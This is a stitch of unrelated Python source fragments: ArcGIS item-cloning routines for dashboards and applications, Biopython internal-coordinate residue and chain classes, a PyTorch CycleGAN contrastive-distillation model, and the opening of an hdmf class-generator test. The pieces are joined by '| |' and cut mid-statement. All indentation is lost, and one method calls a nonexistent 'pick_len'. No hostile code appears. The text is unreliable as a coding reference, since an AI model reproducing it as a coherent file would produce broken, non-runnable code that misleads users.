dataset["dataSource"]["layerId"] = cloned_service['layer_id_mapping'][dataset["dataSource"]["layerId"]]
# update the item id
dataset["dataSource"]["itemId"] = clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]
if "leftPanel" in app_json and "selectors" in app_json["leftPanel"]:
for selector in app_json["leftPanel"]["selectors"]:
if "datasets" in selector:
for dataset in selector["datasets"]:
if "dataSource" in dataset and "itemId" in dataset["dataSource"]:
# in some cases the layer ids may have changed when cloning
# so we can use a mapping between the old and new to update it
for url, cloned_service in clone_mapping['Services'].items():
if cloned_service['id'] == clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]:
# update the layer id
dataset["dataSource"]["layerId"] = cloned_service['layer_id_mapping'][dataset["dataSource"]["layerId"]]
# update the item id
dataset["dataSource"]["itemId"] = clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]
return app_json
@staticmethod
def get_webmap_ids(data):
"""
Parses a dashboard based on version to return the list of webmap ids
:param data: The json/dict to parse
:return: A list of webmap ids
"""
if 'version' in data:
if data['version'] >= 24:
webmap_ids = _DashboardDefinition._get_webmap_ids_v24(data)
else:
raise _ItemCreateException("Dashboard version {} is not supported".format(data['version']))
else:
raise _ItemCreateException("Dashboard is not versioned and cannot be cloned")
return list(webmap_ids)
@staticmethod
def _get_webmap_ids_v24(data):
"""
Parses a dashboard at version 24 to find data webmap ids
:param data: The json/dict to parse
:return: A list of webmap ids
"""
webmap_ids = set()
if 'widgets' in data:
for widget in data['widgets']:
if widget['type'] == 'mapWidget':
if 'itemId' in widget:
webmap_ids.add(widget['itemId'])
return list(webmap_ids)
@staticmethod
def get_layer_ids(data):
"""
Parses a dashboard based on version to return the list of layer ids
:param data: The json/dict to parse
:return: A list of layer ids
"""
if 'version' in data:
if data['version'] >= 24:
layer_ids = _DashboardDefinition._get_layer_ids_v24(data)
else:
raise _ItemCreateException("Dashboard version {} is not supported".format(data['version']))
else:
raise _ItemCreateException("Dashboard is not versioned and cannot be cloned")
return list(layer_ids)
@staticmethod
def _get_layer_ids_v24(data):
"""
Parses a dashboard at version 24 to find layer/service ids
:param data: The json/dict to parse
:return: A list of layer ids
"""
layer_ids = set()
if "widgets" in data:
for widget in data["widgets"]:
if "datasets" in widget:
layer_ids = layer_ids.union(_DashboardDefinition.
_parse_datasets_v24(widget["datasets"]), layer_ids)
if "headerPanel" in data and "selectors" in data["headerPanel"]:
for selector in data["headerPanel"]["selectors"]:
if "datasets" in selector:
layer_ids = layer_ids.union(_DashboardDefinition.
_parse_datasets_v24(selector["datasets"]), layer_ids)
if "leftPanel" in data and "selectors" in data["leftPanel"]:
for selector in data["leftPanel"]["selectors"]:
if "datasets" in selector:
layer_ids = layer_ids.union(_DashboardDefinition.
_parse_datasets_v24(selector["datasets"]), layer_ids)
return layer_ids
@staticmethod
def _parse_datasets_v24(datasets):
"""
Parses a data set in a version 24 dashboard
:param datasets: the list of datasets
:return: A set of layer ids
"""
layer_ids = set()
for dataset in datasets:
# newer schema
if "dataSource" in dataset:
ds = dataset["dataSource"]
# newer property
if "itemId" in ds:
layer_ids.add(ds['itemId'])
return layer_ids
class _ApplicationDefinition(_TextItemDefinition):
"""
Represents the definition of an application within ArcGIS Online or Portal.
"""
def __init__(self, target, clone_mapping, info, source_app_title=None, update_url=True, data=None, sharing=None, thumbnail=None, portal_item=None, item_extent=None, folder=None, search_existing=True, owner=None):
super().__init__(target, clone_mapping, info, data, sharing, thumbnail, portal_item, folder, item_extent, search_existing, owner)
self._source_app_title = source_app_title
self._update_url = update_url
@property
def source_app_title(self):
"""Gets the title of the application"""
return self._source_app_title
@property
def update_url(self):
"""Gets a value indicating if the application url should be updated"""
return self._update_url
def clone(self):
"""Clone the application in the target organization.
"""
try:
new_item = None
original_item = self.info
if self._search_existing:
new_item = _search_org_for_existing_item(self.target, self.portal_item)
if not new_item:
org_url = _get_org_url(self.target)
is_web_appbuilder = False
# Get the item properties from the original application which will be applied when the new item is created
item_properties = self._get_item_properties(self.item_extent)
# Swizzle the item ids of the web maps, groups and URLs of defined in the application's data
app_json = self.data
if app_json is not None:
app_json_text = ''
# If item is a story map don't swizzle any of the json references
if 'Story Map' in original_item['typeKeywords'] or 'Story Maps' in original_item['typeKeywords']:
app_json_text = json.dumps(app_json)
else:
if "Web AppBuilder" in original_item['typeKeywords']: #Web AppBuilder
is_web_appbuilder = True
if 'portalUrl' in app_json:
app_json['portalUrl'] = org_url
if 'map' in app_json:
if 'portalUrl' in app_json['map']:
app_json['map']['portalUrl'] = org_url
if 'itemId' in app_json['map']:
app_json['map']['itemId'] = self._clone_mapping['Item IDs'][app_json['map']['itemId']]
if 'mapOptions' in app_json['map'] and app_json['map']['mapOptions'] is not None:
if 'extent' in app_json['map']['mapOptions']:
del app_json['map']['mapOptions']['extent']
if 'httpProxy' in app_json:
if 'url' in app_json['httpProxy']:
app_json['httpProxy']['url'] = org_url + "sharing/proxy"
if 'geometryService' in app_json and 'geometry' in self.target.properties['helperServices']:
app_json['geometryService'] = self.target.properties['helperServices']['geometry']['url']
else: #Configurable Application Template
if 'folderId' in app_json:
user = self.target.users.get(self.owner)
if self.folder is not None:
folders = user.folders
target_folder = next((f for f in folders if f['title'].lower() == self.folder.lower()), None)
if target_folder:
app_json['folderId'] = _deep_get(target_folder, 'id')
else:
app_json['folderId'] = None
if 'values' in app_json:
if 'group' in app_json['values']:
app_json['values']['group'] = self._clone_mapping['Group IDs'][app_json['values']['group']]
if 'webmap' in app_json['values']:
if isinstance(app_json['values']['webmap'], list):
new_webmap_ids = []
for webmap_id in app_json['values']['webmap']:
new_webmap_ids.append(self._clone_mapping['Item IDs'][webmap_id])
app_json['values']['webmap'] = new_webmap_ids
else:
app_json['values']['webmap'] = self._clone_mapping['Item IDs'][app_json['values']['webmap']]
if self.source_app_title is not None:
search_query = 'title:"{0}" AND owner:{1} AND type:Web Mapping Application'.format(self.source_app_title, "esri_en")
search_items = self.target.content.search(search_query, max_items=100, outside_org=True)
if len(search_items) > 0:
existing_item = max(search_items, key=lambda x: x['created'])
app_json['source'] = existing_item['id']
app_json_text = json.dumps(app_json)
for original_url in self._clone_mapping['Services']:
service = self._clone_mapping['Services'][original_url]
for key, value in service['layer_id_mapping'].items():
app_json_text = re.sub("{0}/{1}".format(original_url, key),
"{0}/{1}".format(service['url'], value),
app_json_text, 0, re.IGNORECASE)
app_json_text = re.sub(original_url, service['url'], app_json_text, 0, re.IGNORECASE)
for original_id in self._clone_mapping['Item IDs']:
app_json_text = re.sub(original_id, self._clone_mapping['Item IDs'][original_id], app_json_text, 0, re.IGNORECASE)
for original_web_tool in self._clone_mapping['Web Tools']:
app_json_text = re.sub(original_web_tool, self._clone_mapping['Web Tools'][original_web_tool], app_json_text, 0, re.IGNORECASE)
# Replace any references to default print service
new_print_url = _deep_get(self.target.properties, 'helperServices', 'printTask', 'url')
if new_print_url is not None:
old_print_url = 'https://utility.arcgisonline.com/arcgis/rest/services/Utilities/PrintingTools/GPServer/Export%20Web%20Map%20Task'
if self.portal_item is not None and _deep_get(self.portal_item._gis.properties, 'helperServices', 'printTask', 'url') is not None:
old_print_url = _deep_get(self.portal_item._gis.properties, 'helperServices', 'printTask', 'url')
app_json_text = re.sub(old_print_url, new_print_url, app_json_text, 0, re.IGNORECASE)
if old_print_url.startswith('https://'):
app_json_text = re.sub('http://' + old_print_url[8:], new_print_url, app_json_text, 0, re.IGNORECASE)
elif old_print_url.startswith('http://'):
app_json_text = re.sub('https://' + old_print_url[7:], new_print_url, app_json_text, 0, re.IGNORECASE)
# Perform a general find and replace of field names if field mapping is required
for service in self._clone_mapping['Services']:
for layer_id in self._clone_mapping['Services'][service]['layer_field_mapping']:
field_mapping = self._clone_mapping['Services'][service]['layer_field_mapping'][layer_id]
app_json_text = _find_and_replace_fields(app_json_text, field_mapping)
# Replace any references to the original org url with the target org url. Used to re-point item resource references
if original_item['url'] is not None:
url = original_item['url']
find_string = "/apps/"
index = url.find(find_string)
if index != -1:
source_org_url = url[:index+1]
app_json_text = re.sub(source_org_url, org_url, app_json_text, 0, re.IGNORECASE)
item_properties['text'] = app_json_text
# Add the new item
new_item = self._add_new_item(item_properties)
# Update the url of the item to point to the new portal and new id of the application if required
if original_item['url'] is not None:
url = original_item['url']
if self.update_url:
find_string = "/apps/"
index = original_item['url'].find(find_string)
url = '{0}{1}'.format(org_url.rstrip('/'), original_item['url'][index:])
find_string = "id="
index = url.find(find_string)
url = '{0}{1}'.format(url[:index + len(find_string)], new_item.id)
item_properties = {'url' : url}
new_item.update(item_properties)
# Add a code attachment if the application is Web AppBuilder so that it can be downloaded
if is_web_appbuilder:
url = '{0}sharing/rest/content/items/{1}/package'.format(org_url[org_url.find('://') + 1:], new_item['id'])
code_attachment_properties = {'title' : new_item['title'], 'type' : 'Code Attachment', 'typeKeywords' : 'Code,Web Mapping Application,Javascript',
'relationshipType' : 'WMA2Code', 'originItemId' : new_item['id'], 'url' : url }
code_attachment = self.target.content.add(item_properties=code_attachment_properties, folder=self.folder, owner=self.owner)
# With Portal sometimes after sharing the application the url is reset.
# Check if the url is incorrect after sharing and set back to correct url.
if 'url' in new_item and new_item['url'] is not None:
url = new_item['url']
new_item = self.target.content.get(new_item['id'])
if new_item['url'] != url:
new_item.update({'url': url})
_share_item_with_groups(new_item, self.sharing, self._clone_mapping["Group IDs"])
self.resolved=True
self._clone_mapping['Item IDs'][original_item['id']] = new_item['id']
return new_item
except Exception as ex:
raise _ItemCreateException("Failed to create {0} {1}: {2}".format(original_item['type'], original_item['title'], str(ex)), new_item)
class _FormDefinition(_ItemDefinition):
"""
Represents the definition of an form within ArcGIS Online or Portal.
"""
def __init__(self, target, clone_mapping, info, related_items, data=None, sharing=None, thumbnail=None, portal_item=None, folder=None, | |
self.hedra.get(angle_key, None)
elif ':' in angle_key:
angle_key = self._get_ak_tuple(angle_key)
rval = self.dihedra.get(angle_key, None)
elif 'psi' == angle_key:
if 0 == len(self.rnext):
return None
rn = self.rnext[0]
sN, sCA, sC = self.rak('N'), self.rak('CA'), self.rak('C')
nN = rn.rak('N')
rval = self.dihedra.get((sN, sCA, sC, nN), None)
elif 'phi' == angle_key:
if 0 == len(self.rprev):
return None
rp = self.rprev[0]
pC, sN, sCA = rp.rak('C'), self.rak('N'), self.rak('CA')
sC = self.rak('C')
rval = rp.dihedra.get((pC, sN, sCA, sC), None)
elif 'omg' == angle_key or 'omega' == angle_key:
if 0 == len(self.rprev):
return None
rp = self.rprev[0]
pCA, pC, sN = rp.rak('CA'), rp.rak('C'), self.rak('N')
sCA = self.rak('CA')
rval = rp.dihedra.get((pCA, pC, sN, sCA), None)
elif angle_key.startswith('chi'):
sclist = pic_data_sidechains.get(self.lc, None)
if sclist is None:
return None
for akl in sclist:
if 5 == len(akl):
if akl[4] == angle_key:
klst = [self.rak(a) for a in akl[0:4]]
rval = self.dihedra.get(tuple(klst), None)
return rval
def get_angle(self, angle_key):
"""Get dihedron or hedron angle for specified key.
See pick_angle() for key specifications.
"""
rval = self.pick_angle(angle_key)
if rval is not None:
return rval.get_angle()
return None
def set_angle(self, angle_key, v):
"""Set dihedron or hedron angle for specified key.
See pick_angle() for key specifications.
"""
rval = self.pick_angle(angle_key)
if rval is not None:
rval.set_angle(v)
def pick_length(self, ak_spec):
"""Get list of hedra containing specified atom pair.
:param ak_spec: str or tuple of AtomKeys
str: Two atom names separated by ':', e.g. 'N:CA'
Optional position specifier relative to self,
e.g. '-1C:N' for preceding peptide bond.
"""
rlst = []
if ':' in ak_spec:
ak_spec = self._get_ak_tuple(ak_spec)
for hed_key, hed_val in self.hedra.items():
if all(ak in hed_key for ak in ak_spec):
rlst.append(hed_val)
return rlst, ak_spec
def get_length(self, ak_spec):
"""Get bond length for specified atom pair.
See pick_length() for ak_spec.
"""
hed_lst, ak_spec = self.pick_length(ak_spec)
for hed in hed_lst:
val = hed.get_length(ak_spec)
if val is not None:
return val
return None
def set_length(self, ak_spec, val):
"""Set bond length for specified atom pair.
See pick_length() for ak_spec.
"""
hed_lst, ak_spec = self.pick_len(ak_spec)
for hed in hed_lst:
hed.set_length(ak_spec, val)
def applyMtx(self, mtx):
"""Apply matrix to atom_coords for this residue."""
for ak, ac in self.atom_coords.items():
# self.atom_coords[ak] = mtx @ ac
self.atom_coords[ak] = mtx.dot(ac)
class IC_Chain:
"""Class to extend Biopython Chain with internal coordinate data.
Attributes
----------
MaxPeptideBond : Class attribute to detect chain breaks. Override to
fully contiguous chains with some very long bonds - e.g. for 3D
printing (OpennSCAD output) a structure with fully disordered (missing)
residues.
chain : biopython Chain object reference
The Chain object this extends
ordered_aa_pic_list : list of IC_Residue objects
IC_Residue objects PIC algorithms can process (e.g. no waters)
initNCaC : AtomKey indexed dictionary of N, Ca, C atom coordinates to start
chain segments (first residue or after chain break)
Methods
-------
set_residues()
Add .pic attribute for all Residues, populate ordered_aa_pic_list, set
IC_Residue rprev, rnext or initNCaC coordinates
link_residues()
Call link_dihedra() on each IC_Residue (needs rprev, rnext set)
render_dihedra()
Call render_hedra() and render_dihedra() on each IC_Residue
assemble_residues()
Generate IC_Residue atom coords from internal coordinates
coords_to_structure()
update Biopython Residue.Atom coords for all Residues with IC_Residue
attributes
internal_to_atom_coordinates()
Process pic data to Residue/Atom coordinates
dihedra_from_atoms()
Calculate dihedrals, angles, bond lengths for Atom data
"""
MaxPeptideBond = 1.4
def __init__(self, parent):
"""Initialize IC_Chain object, with or without residue/Atom data.
:param parent: Biopython Chain object
Chain object this extends
"""
self.chain = parent
self.ordered_aa_pic_list = []
self.initNCaC = {}
self.sqMaxPeptideBond = (IC_Chain.MaxPeptideBond
* IC_Chain.MaxPeptideBond)
self.set_residues() # no effect if no residues loaded
def _peptide_check(self, prev, curr):
if 0 == len(curr.child_dict):
# curr residue with no atoms => reading pic file, no break
return True
if ((0 != len(curr.child_dict))
and (0 == len(prev.child_dict))):
# prev residue with no atoms, curr has atoms => reading pic file,
# have break
return False
# both biopython Resdiues have Atoms, so check distance
Natom = curr.child_dict.get('N', None)
pCatom = prev.child_dict.get('C', None)
if Natom is None or pCatom is None:
return False
# confirm previous residue has all backbone atoms
pCAatom = prev.child_dict.get('CA', None)
pNatom = prev.child_dict.get('N', None)
if pNatom is None or pCAatom is None:
return False
if Natom.is_disordered():
Natom = Natom.selected_child
if pCatom.is_disordered():
pCatom = pCatom.selected_child
diff = curr['N'].coord - prev['C'].coord
sum = 0
for axis in diff:
if axis > self.MaxPeptideBond:
return False
sum += axis * axis
if sum > self.sqMaxPeptideBond:
return False
return True
def _add_residue(self, res, last_res, last_ord_res):
"""Set rprev, rnext, determine chain break."""
if not hasattr(res, 'internal_coord'):
res.internal_coord = IC_Residue(res)
if (0 < len(last_res) and last_ord_res == last_res
and self._peptide_check(last_ord_res[0].residue, res)):
# no chain break
for prev in last_ord_res:
prev.rnext.append(res.internal_coord)
res.internal_coord.rprev.append(prev)
return True
elif all(atm in res.child_dict for atm in ('N', 'CA', 'C')):
# chain break, save coords for restart
initNCaC = {}
rpic = res.internal_coord
for atm in ('N', 'CA', 'C'):
bpAtm = res.child_dict[atm]
if bpAtm.is_disordered():
for altAtom in bpAtm.child_dict.values():
ak = AtomKey(rpic, altAtom)
initNCaC[ak] = IC_Residue.atm241(
altAtom.coord)
else:
ak = AtomKey(rpic, bpAtm)
initNCaC[ak] = IC_Residue.atm241(
bpAtm.coord)
self.initNCaC[rpic.rbase] = initNCaC
return True
elif (0 == len(res.child_list) and
self.chain.child_list[0].id == res.id and
res.internal_coord.is20AA):
# this is first residue, no atoms at all, is std amino acid
# conclude reading PIC file with no N-Ca-C coords
return True
# chain break but do not have N, Ca, C coords to restart from
return False
def set_residues(self):
"""Initialize pic data for loaded Residues.
Add IC_Residue as .pic attribute for each Residue in parent Chain;
populate ordered_aa_pic_list with IC_Residue references for residues
which can be built (amino acids and some hetatms); set rprev and rnext
on each sequential IC_Residue, populate initNCaC at start and after
chain breaks.
"""
# ndx = 0
last_res = []
last_ord_res = []
for res in self.chain.get_residues():
# select only not hetero or accepted hetero
if res.id[0] == ' ' or res.id[0] in IC_Residue.accept_resnames:
this_res = []
if 2 == res.is_disordered():
# print('disordered res:', res.is_disordered(), res)
for r in res.child_dict.values():
if self._add_residue(r, last_res, last_ord_res):
this_res.append(r.internal_coord)
else:
if self._add_residue(res, last_res, last_ord_res):
this_res.append(res.internal_coord)
if 0 < len(this_res):
self.ordered_aa_pic_list.extend(this_res)
last_ord_res = this_res
last_res = this_res
def link_residues(self):
"""link_dihedra() for each IC_Residue; needs rprev, rnext set."""
for rpic in self.ordered_aa_pic_list:
rpic.link_dihedra()
def render_dihedra(self):
"""Set dihedron local coords for each IC_Residue."""
for rpic in self.ordered_aa_pic_list:
rpic.render_dihedra()
def assemble_residues(self, start=False, fin=False):
"""Generate IC_Residue atom coords from internal coordinates.
Filter positions between start and fin if set, find appropriate start
coordinates for each residue and pass to IC_Residue.assemble()
:param start, fin: lists
sequence position, insert code for begin, end of subregion to
process
"""
for rpic in self.ordered_aa_pic_list:
resSeq, resicode = rpic.residue.id[1:]
go = True
if (start and
(start[0] > resSeq or
(start[0] == resSeq and start[1] < resicode))):
go = False
if (go and fin and
(fin[0] < resSeq or
(fin[0] == resSeq and fin[1] > resicode))):
go = False
if go:
rpic.atom_coords = rpic.assemble()
rpic.ak_set = set(rpic.atom_coords.keys())
def coords_to_structure(self):
"""All pic atom_coords to Biopython Residue/Atom coords."""
self.ndx = 0
for res in self.chain.get_residues():
if 2 == res.is_disordered():
for r in res.child_dict.values():
if hasattr(r, 'internal_coord'):
r.internal_coord.coords_to_residue()
elif hasattr(res, 'internal_coord'):
res.internal_coord.coords_to_residue()
# TODO: fix to allow only updating parts of structure
# esp sidechain rotamers
def internal_to_atom_coordinates(self):
"""Complete process pic data to Residue/Atom coords."""
# self.link_residues()
# self.render_dihedra()
self.assemble_residues()
self.coords_to_structure()
def dihedra_from_atoms(self, allBonds=False):
"""Calculate dihedrals, angles, bond lengths for Atom data."""
for rpic in self.ordered_aa_pic_list:
rpic.dihedra_from_atoms(allBonds)
@staticmethod
def _write_mtx(fp, mtx):
fp.write('[ ')
rowsStarted = False
for row in mtx:
if rowsStarted:
fp.write(', [ ')
else:
fp.write('[ ')
rowsStarted = True
colsStarted = False
for col in row:
if colsStarted:
fp.write(', ' + str(col))
else:
fp.write(str(col))
colsStarted = True
fp.write(' ]') # close row
fp.write(' ]')
@staticmethod
def _writeSCAD_dihed(fp, d, transformations, hedraNdx, hedraSet):
fp.write('[ {:9.5f}, {}, {}, {}, '.format(d.dihedral1,
hedraNdx[d.h1key],
hedraNdx[d.h2key],
(1 if d.reverse else 0)))
fp.write('{}, {}, '.format((0 if d.h1key in hedraSet else 1),
(0 if d.h2key in hedraSet else 1)))
fp.write(' // {} [ {} -- {} ] {}\n'.format(d.id, d.hedron1.id,
d.hedron2.id,
('reversed' if | |
import torch
import itertools
from util.image_pool import ImagePool
from .base_model import BaseModel
from pytorch_wavelets import DWTForward, DWTInverse
from . import networks
from packaging import version
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import init
import numpy as np
cross_entropy_loss = torch.nn.CrossEntropyLoss()
'''
def get_sample_ids(s, t, temperature=0.1):
s = s.permute(0, 2, 3, 1).flatten(1, 2)
t = t.permute(0, 2, 3, 1).flatten(1, 2)
# b x wh x c
s_attention = torch.mean(torch.abs(s), [2])
t_attention = torch.mean(torch.abs(t), [2])
attention = s_attention + t_attention
attention = attention.view(-1)
attention = F.softmax(attention/temperature) + 1e-8
indices = np.arange(attention.shape[0])
sample_result = np.random.choice(a=indices, size=64, replace=False, p=attention.cpu().detach().numpy())
sample_result = torch.LongTensor(sample_result)
#value, indexs = torch.sort(attention, dim=0, descending=True)
return [sample_result] #indexs[:64]
'''
def get_sample_ids(s, t, temperature=0.1):
s = s.permute(0, 2, 3, 1).flatten(1, 2)
t = t.permute(0, 2, 3, 1).flatten(1, 2)
# b x wh x c
s_attention = torch.mean(torch.abs(s), [2])
t_attention = torch.mean(torch.abs(t), [2])
attention = s_attention + t_attention
attention = attention.view(-1)
value, indexs = torch.sort(attention, dim=0, descending=True)
return [indexs[:64]]
def init_weights(net, init_type='normal', init_gain=0.02, debug=False):
"""Initialize network weights.
Parameters:
net (network) -- network to be initialized
init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might
work better for some applications. Feel free to try yourself.
"""
def init_func(m): # define the initialization function
classname = m.__class__.__name__
if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
if debug:
print(classname)
if init_type == 'normal':
init.normal_(m.weight.data, 0.0, init_gain)
elif init_type == 'xavier':
init.xavier_normal_(m.weight.data, gain=init_gain)
elif init_type == 'kaiming':
init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
elif init_type == 'orthogonal':
init.orthogonal_(m.weight.data, gain=init_gain)
else:
raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
if hasattr(m, 'bias') and m.bias is not None:
init.constant_(m.bias.data, 0.0)
elif classname.find(
'BatchNorm2d') != -1: # BatchNorm Layer's weight is not a matrix; only normal distribution applies.
init.normal_(m.weight.data, 1.0, init_gain)
init.constant_(m.bias.data, 0.0)
net.apply(init_func) # apply the initialization function <init_func>
def init_net(net, init_type='normal', init_gain=0.02, gpu_ids=[], debug=False, initialize_weights=True):
"""Initialize a network: 1. register CPU/GPU device (with multi-GPU support); 2. initialize the network weights
Parameters:
net (network) -- the network to be initialized
init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal
gain (float) -- scaling factor for normal, xavier and orthogonal.
gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2
Return an initialized network.
"""
if len(gpu_ids) > 0:
assert (torch.cuda.is_available())
net.to(gpu_ids[0])
# if not amp:
# net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs for non-AMP training
if initialize_weights:
init_weights(net, init_type, init_gain=init_gain, debug=debug)
return net
class Normalize(nn.Module):
def __init__(self, power=2):
super(Normalize, self).__init__()
self.power = power
def forward(self, x):
norm = x.pow(self.power).sum(1, keepdim=True).pow(1. / self.power)
out = x.div(norm + 1e-7)
return out
class PatchNCELoss(nn.Module):
def __init__(self, opt):
super().__init__()
self.opt = opt
self.cross_entropy_loss = torch.nn.CrossEntropyLoss(reduction='none')
self.mask_dtype = torch.uint8 if version.parse(torch.__version__) < version.parse('1.2.0') else torch.bool
def forward(self, feat_q, feat_k): # 算 Contrastive loss feat_q 学生特征, feat_k 老师特征
batchSize = feat_q.shape[0]
dim = feat_q.shape[1]
feat_k = feat_k.detach()
# pos logit
l_pos = torch.bmm(feat_q.view(batchSize, 1, -1), feat_k.view(batchSize, -1, 1))
l_pos = l_pos.view(batchSize, 1)
# neg logit
# Should the negatives from the other samples of a minibatch be utilized?
# In CUT and FastCUT, we found that it's best to only include negatives
# from the same image. Therefore, we set
# --nce_includes_all_negatives_from_minibatch as False
# However, for single-image translation, the minibatch consists of
# crops from the "same" high-resolution image.
# Therefore, we will include the negatives from the entire minibatch.
self.opt.nce_includes_all_negatives_from_minibatch = False
self.opt.nce_T = 0.07
if self.opt.nce_includes_all_negatives_from_minibatch:
# reshape features as if they are all negatives of minibatch of size 1.
batch_dim_for_bmm = 1
else:
batch_dim_for_bmm = self.opt.batch_size
# reshape features to batch size
feat_q = feat_q.view(batch_dim_for_bmm, -1, dim)
feat_k = feat_k.view(batch_dim_for_bmm, -1, dim)
npatches = feat_q.size(1)
l_neg_curbatch = torch.bmm(feat_q, feat_k.transpose(2, 1))
# diagonal entries are similarity between same features, and hence meaningless.
# just fill the diagonal with very small number, which is exp(-10) and almost zero
diagonal = torch.eye(npatches, device=feat_q.device, dtype=self.mask_dtype)[None, :, :]
l_neg_curbatch.masked_fill_(diagonal, -10.0)
l_neg = l_neg_curbatch.view(-1, npatches)
out = torch.cat((l_pos, l_neg), dim=1) / self.opt.nce_T
loss = self.cross_entropy_loss(out, torch.zeros(out.size(0), dtype=torch.long,
device=feat_q.device))
return loss.mean() # return loss
# 随机采样部分进行蒸馏
class PatchSampleF(nn.Module):
def __init__(self, use_mlp=False, init_type='normal', init_gain=0.02, nc=256, gpu_ids=[0]):
# potential issues: currently, we use the same patch_ids for multiple images in the batch
super(PatchSampleF, self).__init__()
self.l2norm = Normalize(2)
self.use_mlp = use_mlp
self.nc = nc # hard-coded
self.mlp_init = False
self.init_type = init_type
self.init_gain = init_gain
self.gpu_ids = gpu_ids
def create_mlp(self, feats):
for mlp_id, feat in enumerate(feats):
input_nc = feat.shape[1]
mlp = nn.Sequential(*[nn.Linear(input_nc, self.nc), nn.ReLU(), nn.Linear(self.nc, self.nc)])
if len(self.gpu_ids) > 0:
mlp.cuda()
setattr(self, 'mlp_%d' % mlp_id, mlp)
init_net(self, self.init_type, self.init_gain, self.gpu_ids)
self.mlp_init = True
def forward(self, feats, num_patches=64, patch_ids=None): # 输入一个特征,输出采样后的特征。
return_ids = []
return_feats = []
if self.use_mlp and not self.mlp_init:
self.create_mlp(feats)
for feat_id, feat in enumerate(feats):
B, H, W = feat.shape[0], feat.shape[2], feat.shape[3]
feat_reshape = feat.permute(0, 2, 3, 1).flatten(1, 2)
if num_patches > 0:
if patch_ids is not None:
patch_id = patch_ids[feat_id]
else:
patch_id = torch.randperm(feat_reshape.shape[1], device=feats[0].device)
patch_id = patch_id[:int(min(num_patches, patch_id.shape[0]))] # .to(patch_ids.device)
x_sample = feat_reshape[:, patch_id, :].flatten(0, 1) # reshape(-1, x.shape[1])
else:
x_sample = feat_reshape
patch_id = []
if self.use_mlp:
mlp = getattr(self, 'mlp_%d' % feat_id)
x_sample = mlp(x_sample)
return_ids.append(patch_id)
x_sample = self.l2norm(x_sample)
if num_patches == 0:
x_sample = x_sample.permute(0, 2, 1).reshape([B, x_sample.shape[-1], H, W])
return_feats.append(x_sample)
return return_feats, return_ids # 返回feature和 采样用的 patch_ids
def get_gram(feat):
'''
:param feat: feature [B x C x W x H]
:return: Gram Matrix of feat
'''
b, c, w, h = feat.size(0), feat.size(1), feat.size(2), feat.size(3)
feat = feat.view(b, c, -1) # b x c x wh
feat_transpose = feat.permute(0, 2, 1) # b x wh x c
gram_matrix = torch.bmm(feat, feat_transpose)
return gram_matrix
def sample_gumbel(shape, eps=1e-20):
U = torch.rand(shape)
U = U.cuda()
return -torch.log(-torch.log(U + eps) + eps)
def gumbel_softmax_sample(logits, temperature=1):
y = logits + sample_gumbel(logits.size())
return F.softmax(y / temperature, dim=-1)
def gumbel_softmax(logits, temperature=1, hard=False):
"""
ST-gumple-softmax
input: [*, n_class]
return: flatten --> [*, n_class] an one-hot vector
"""
y = gumbel_softmax_sample(logits, temperature)
if not hard:
return y
shape = y.size()
_, ind = y.max(dim=-1)
y_hard = torch.zeros_like(y).view(-1, shape[-1])
y_hard.scatter_(1, ind.view(-1, 1), 1)
y_hard = y_hard.view(*shape)
# Set gradients w.r.t. y_hard gradients w.r.t. y
y_hard = (y_hard - y).detach() + y
return y_hard
class CycleGANModel(BaseModel):
"""
This class implements the CycleGAN model, for learning image-to-image translation without paired data.
The model training requires '--dataset_mode unaligned' dataset.
By default, it uses a '--netG resnet_9blocks' ResNet generator,
a '--netD basic' discriminator (PatchGAN introduced by pix2pix),
and a least-square GANs objective ('--gan_mode lsgan').
CycleGAN paper: https://arxiv.org/pdf/1703.10593.pdf
"""
@staticmethod
def modify_commandline_options(parser, is_train=True):
"""Add new dataset-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
For CycleGAN, in addition to GAN losses, we introduce lambda_A, lambda_B, and lambda_identity for the following losses.
A (source domain), B (target domain).
Generators: G_A: A -> B; G_B: B -> A.
Discriminators: D_A: G_A(A) vs. B; D_B: G_B(B) vs. A.
Forward cycle loss: lambda_A * ||G_B(G_A(A)) - A|| (Eqn. (2) in the paper)
Backward cycle loss: lambda_B * ||G_A(G_B(B)) - B|| (Eqn. (2) in the paper)
Identity loss (optional): lambda_identity * (||G_A(B) - B|| * lambda_B + ||G_B(A) - A|| * lambda_A) (Sec 5.2 "Photo generation from paintings" in the paper)
Dropout is not used in the original CycleGAN paper.
"""
parser.set_defaults(no_dropout=True) # default CycleGAN did not use dropout
if is_train:
parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')
parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')
parser.add_argument('--lambda_identity', type=float, default=0.5,
help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than | |
<gh_stars>10-100
import numpy as np
import os
import shutil
import tempfile
from hdmf.build import TypeMap, CustomClassGenerator
from hdmf.build.classgenerator import ClassGenerator, MCIClassGenerator
from hdmf.container import Container, Data, MultiContainerInterface, AbstractContainer
from hdmf.spec import GroupSpec, AttributeSpec, DatasetSpec, SpecCatalog, SpecNamespace, NamespaceCatalog, LinkSpec
from hdmf.testing import TestCase
from hdmf.utils import get_docval
from .test_io_map import Bar
from tests.unit.utils import CORE_NAMESPACE, create_test_type_map, create_load_namespace_yaml
class TestClassGenerator(TestCase):
def test_register_generator(self):
"""Test TypeMap.register_generator and ClassGenerator.register_generator."""
class MyClassGenerator(CustomClassGenerator):
@classmethod
def apply_generator_to_field(cls, field_spec, bases, type_map):
return True
@classmethod
def process_field_spec(cls, classdict, docval_args, parent_cls, attr_name, not_inherited_fields, type_map,
spec):
